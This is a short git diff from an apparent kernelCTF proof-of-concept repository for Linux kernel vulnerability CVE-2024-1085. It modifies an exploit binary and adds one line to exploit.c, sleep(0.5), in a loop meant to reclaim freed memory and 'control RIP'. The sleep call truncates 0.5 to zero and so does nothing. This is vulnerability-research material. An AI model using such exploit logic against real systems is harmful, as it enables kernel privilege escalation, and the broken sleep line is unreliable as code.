diff --git a/pocs/linux/kernelctf/CVE-2024-1085_lts/exploit/lts-6.1.70/exploit b/pocs/linux/kernelctf/CVE-2024-1085_lts/exploit/lts-6.1.70/exploit index 36a53531..5c886fdd 100644 Binary files a/pocs/linux/kernelctf/CVE-2024-1085_lts/exploit/lts-6.1.70/exploit and b/pocs/linux/kernelctf/CVE-2024-1085_lts/exploit/lts-6.1.70/exploit differ diff --git a/pocs/linux/kernelctf/CVE-2024-1085_lts/exploit/lts-6.1.70/exploit.c b/pocs/linux/kernelctf/CVE-2024-1085_lts/exploit/lts-6.1.70/exploit.c index 56ecaa2f..f6b1b1ba 100644 --- a/pocs/linux/kernelctf/CVE-2024-1085_lts/exploit/lts-6.1.70/exploit.c +++ b/pocs/linux/kernelctf/CVE-2024-1085_lts/exploit/lts-6.1.70/exploit.c @@ -306,6 +306,7 @@ void exploit(struct nl_sock *socket){ //del table b first del_table(socket, tmp); //Try to get it back and control RIP + sleep(0.5); bitmap_key = i; int t=0; while(1){